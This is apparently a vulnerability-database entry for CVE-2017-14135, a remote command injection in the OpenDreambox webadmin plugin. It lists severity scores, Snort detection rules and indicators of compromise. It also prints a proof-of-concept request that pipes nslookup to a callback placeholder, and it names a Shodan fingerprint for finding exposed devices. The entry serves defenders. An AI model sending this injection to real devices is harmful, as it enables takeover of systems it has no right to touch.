cbcvebase.
CVE-2017-14135
published 2017-09-04

CVE-2017-14135: enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS…

PriorityP184critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
21.84%
97.3th percentile
enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py in the webadmin plugin for opendreambox 2.0.0 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI.

Affected

1 ranges
VendorProductVersion rangeFixed in
dreamboxopendreambox

Detection & IOCsextracted from sources · hover to see the quote

url/webadmin/script?command=
path/webadmin/script
commandGET /webadmin/script?command=|%20nslookup%20{{interactsh-url}}
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible OpenDreamBox Attempted Remote Command Injection Inbound"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/webadmin/script?command="; fast_pattern; reference:url,unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; reference:cve,CVE-2017-14135; classtype:attempted-admin; sid:2027453; rev:3; metadata:attack_target IoT, created_at 2019_06_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2020_08_31, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
snort
alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible OpenDreamBox Attempted Remote Command Injection Outbound"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/webadmin/script?command="; fast_pattern; reference:url,unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/; reference:cve,CVE-2017-14135; classtype:attempted-admin; sid:2027452; rev:3; metadata:attack_target IoT, created_at 2019_06_11, deployment Perimeter, performance_impact Low, confidence High, signature_severity Major, updated_at 2020_08_31, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit traffic uses shell metacharacter '|' in the 'command' parameter of POST/GET requests to /webadmin/script — look for pipe, semicolon, backtick, or other shell metacharacters in that parameter.
  • Response body containing '/bin/sh' or '/usr/script' is a strong indicator of successful exploitation.
  • Shodan/FOFA fingerprint for exposed targets: HTTP title 'Dreambox WebControl' — use as a pre-exploitation discovery indicator.
  • Emerging Threats rules (SID 2027452/2027453) flag both inbound and outbound POST requests containing '/webadmin/script?command=' — associated with Mirai variant exploitation of IoT devices.
  • DNS callback (OOB) via nslookup is used in PoC to confirm blind RCE — monitor for unexpected DNS lookups originating from OpenDreambox hosts.
  • ·The Emerging Threats Snort rules (SID 2027452/2027453) only match POST method requests to /webadmin/script?command=; the Nuclei PoC template uses GET — detection rules may miss GET-based exploitation attempts.
  • ·The vulnerable file path is within the webadmin plugin source; exploitation requires the webadmin plugin to be installed and accessible on the target OpenDreambox 2.0.0 device.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.